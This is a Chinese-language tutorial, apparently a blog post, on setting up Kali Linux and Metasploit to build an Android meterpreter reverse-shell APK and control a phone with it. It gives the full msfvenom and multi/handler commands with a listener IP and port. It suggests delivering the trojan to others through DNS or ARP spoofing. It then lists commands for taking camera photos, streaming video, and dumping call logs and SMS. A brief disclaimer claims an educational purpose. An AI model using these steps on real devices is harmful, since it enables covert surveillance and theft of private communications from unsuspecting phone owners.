文中提及的部分技術可能帶有一定攻擊性,僅供安全學習和教學用途,禁止非法使用
一、準備工作
將kali系統部署在虛擬機裏
設置虛擬機的目的是爲了不僅僅只有電腦和虛擬機互相連通,這樣設置的話,可以實現其他設備和虛擬機的互通,查詢是否連通輸入
ping IP
設置虛擬機
- 點擊虛擬機上方的 虛擬機 - 設置 - 網絡適配器 - 橋接模式:直接連接物理網絡
- 點擊虛擬機上方的 編輯 - 虛擬網絡編輯器 - 更改設置 - 橋接模式 - 下拉選擇 - wifi或者本地連接(看你電腦系統是通過什麼連接的)
二、正式操作
確保kali使用的是國內源
打開終端,安裝ufw防火牆,開啓5555端口
sudo apt-get install ufw
sudo ufw enable
sudo ufw allow 5555
接下來查詢一下本地IP,箭頭所指即爲虛擬機使用的IP:
sudo ifconfig
然後接下來生成安卓手機端的木馬:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.113 LPORT=5555 R > ~/123.apk
生成的木馬將會保存在 ~ 目錄
接下來啓動msfconsole,進行控制操作:
msfconsole
然後輸入以下命令,注意替換IP:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.0.113
set LPORT 5555
show options
這時候我們輸入 exploit
開始執行漏洞 開始監聽…
準備工作準備就緒,現在要做的就是把木馬文件搞到人家的手機上,思路有很多 可以DNS arp劫持欺騙 只要對方用手機下載文件,打開文件,我們就可以進行一些操作了。
強調一點:被侵入對象需要給我們的木馬文件一些權限,諸如訪問電話,信息,錄音,相機,手機存儲等權限。
只有拿到這些權限我們才能爲所欲爲。
由於我們是自我學習測試,我們手動給安裝上的木馬文件這些權限。安裝後的文件已Mainactivity的名字顯示在手機桌面上。點擊打開不會有任何操作,而此時我們的控制檯則返回用戶連接信息。
此時我們採集一下前置攝像頭的照片試試:webcam_snap -i 2
如果要採集後置攝像頭,只需將2
改爲1
即可。獲取手機攝像頭的代碼爲:webcam_list
,實時後置攝像頭代碼爲:webcam_stream
。
獲取通話記錄的代碼爲:dump_calllog
,獲取的記錄會保存在 ~ 目錄下,獲取短信記錄的代碼爲:dump_sms
。
注意一點:當有一會時間未及時操作便出現會連接超時,斷開,用戶需再次點擊木馬文件,你才能繼續操作。更多操作請自行挖掘哦。